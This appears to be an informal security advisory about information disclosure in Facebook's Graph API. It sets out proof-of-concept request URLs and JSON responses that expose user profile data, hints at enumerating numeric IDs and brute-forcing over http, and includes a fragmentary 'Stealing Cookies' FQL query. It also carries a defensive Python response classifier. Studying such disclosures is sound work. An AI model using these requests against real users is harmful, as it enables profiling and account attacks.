Facebook Graph API Users ID (and others) Information Disclosure
# Exploit Title: Facebook Graph API Users ID (and others) Information Disclosure - OAuthException
# Vendor: Facebook.com http://graph.facebook.com
# Author: Juan Carlos Garcia (@secnight)
# Blog: http://hackingmadrid.blogspot.com
BRIEF DESCRIPTION
The Graph API is the primary way that data is retrieved from or posted to Facebook. The Getting Started Guide contains an overview of the basics of the API, walks you through using the Graph API Explorer, shows you how names work, how permissions work, what connections are, and puts it all together so the rest of this reference makes sense.
Disclosure
Anyone can access data from ANY user because of the information the Graph API releases, a consequence of the functionality Facebook has given this API for developers.
The "excess" functionality provided in this API exposes user data without any need for it; any malicious attacker can compile information about a target from it.
It is possible to identify people by their id, as will be seen in the proof of concept, and the insecure http protocol also makes it vulnerable to a brute force attack.
Proof Of Concept (PoC)
First …
As you can see, we have a "GraphMethodException":
{
  "error": {
    "message": "Unsupported get request",
    "type": "GraphMethodException",
    "code": 100
  }
}
Creating an OAuthException
http://graph.facebook.com/00000000000000000000000000000000000000000000
{
  "error": {
    "message": "(#803) Some of the aliases you requested do not exist: 00000000000000000000000000000000000",
    "type": "OAuthException",
    "code": 803
  }
}
Mark Zuckerberg, CEO Facebook
{
  "id": "4",
  "name": "Mark Zuckerberg",
  "first_name": "Mark",
  "last_name": "Zuckerberg",
  "link": "https://www.facebook.com/zuck",
  "username": "zuck",
  "gender": "male",
  "locale": "en_US"
}
-- curious … The number 4 .. Who is id 1,2,3 ;)
The Reverse: http://graph.facebook.com/4
Metadata Disclosure
This web .. WTF???
https://graph.facebook.com/172393869485449?metadata=1
https://graph.facebook.com/?ids=http://hackingmadrid.blogspot.com
but...
https://graph.facebook.com/172393869485449?metadata=2
{ "error": { "message": "(#100) Param metadata must be a boolean", "type": "OAuthException", "code": 100 } }
OK, OK ;)
https://graph.facebook.com/172393869485449?metadata=0
IDS=google
https://graph.facebook.com/?ids=google
TWITTER SHARES ? ..
https://graph.facebook.com/?ids=https://www.twitter.com/
{
  "https://www.twitter.com/": {
    "id": "https://www.twitter.com/",
    "shares": 1386667
  }
}
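As an added example (not part of the original advisory), a small Python helper that sorts the three Graph API response shapes shown above (error envelope, single profile object, and the id-keyed map returned by ?ids= lookups), reports which profile fields a reply exposes, and refuses the plain-http endpoint used in the PoC URLs. The sample bodies are constructed from the responses quoted on this page, with the long alias string shortened.

```python
import json
from urllib.parse import urlparse

# Constructed samples, re-typed from the responses quoted in this advisory.
SAMPLE_METHOD_ERROR = ('{"error": {"message": "Unsupported get request", '
                       '"type": "GraphMethodException", "code": 100}}')
SAMPLE_OAUTH_ERROR = ('{"error": {"message": "(#803) Some of the aliases you '
                      'requested do not exist: 0000", "type": "OAuthException", "code": 803}}')
SAMPLE_PROFILE = ('{"id": "4", "name": "Mark Zuckerberg", "first_name": "Mark", '
                  '"last_name": "Zuckerberg", "link": "https://www.facebook.com/zuck", '
                  '"username": "zuck", "gender": "male", "locale": "en_US"}')
SAMPLE_IDS_MAP = ('{"https://www.twitter.com/": {"id": "https://www.twitter.com/", '
                  '"shares": 1386667}}')

# Profile fields the advisory shows being returned without any access token.
PII_FIELDS = {"name", "first_name", "last_name", "link", "username", "gender", "locale"}


def require_https(url):
    """Reject a plain-http Graph API URL before anything is sent; the advisory
    points out that the http endpoint leaves lookups open to interception."""
    parts = urlparse(url)
    if parts.scheme != "https" or not parts.netloc:
        raise ValueError("refusing non-https Graph API URL: %s" % url)
    return url


def classify(body):
    """Sort a Graph API response body into one of the three shapes seen above:
    an error envelope, a single object, or the map returned by ?ids= lookups.
    For a single object, also list which of the PII fields it carries."""
    data = json.loads(body)
    if not isinstance(data, dict):
        raise ValueError("unexpected Graph API response shape")
    if "error" in data:
        err = data["error"]
        return {"kind": "error", "type": err.get("type"), "code": err.get("code")}
    if "id" in data:
        return {"kind": "object", "id": data["id"],
                "pii": sorted(PII_FIELDS & set(data))}
    if data and all(isinstance(v, dict) for v in data.values()):
        return {"kind": "batch", "keys": sorted(data)}
    raise ValueError("unexpected Graph API response shape")


if __name__ == "__main__":
    for sample in (SAMPLE_METHOD_ERROR, SAMPLE_OAUTH_ERROR, SAMPLE_PROFILE, SAMPLE_IDS_MAP):
        print(classify(sample))
```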
COOKIES
Columns
Name | Type
expires | timestamp
name | string
path | string
uid | numeric string
value | string
To access this table you only need:
- a valid access token with basic permissions.
Facebook Login makes it easy to connect with users on your app or website. You can use several methods in the JavaScript or mobile SDKs to speed up the registration process and build a functional system in minutes.
Stealing Cookies
You only need the next SQL query to extract the cookie...
SELECT ... FROM cookies WHERE uid = A
Note: Additional filters on other columns can be specified, but they may make the query less efficient.
Permissions
To access this table you ONLY need:
- a valid access token with basic permissions.
/Admin
{
  "id": "100005597474065",
  "name": "AD Min",
  "first_name": "AD",
  "last_name": "Min",
  "link": "https://www.facebook.com/ad.min",
  "username": "ad.min",
  "gender": "male",
  "locale": "ru_RU"
}
Procedure: Open the links given above and you can play .. No hack, No fun ;)
Brute Force ?
IF protocol="http"
THEN protocol.http.vulnerable=Brute.Force.Attack
Easy? I think YES !!!
All such information disclosures, produced by the API's excess functionality for developers, make the information gathering phase of a penetration test simple and immediate work on this social network... and make the work easier for malicious users.